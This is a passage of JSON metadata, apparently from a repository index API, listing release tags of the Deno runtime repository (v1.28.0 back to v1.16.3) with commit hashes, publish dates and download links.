","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/host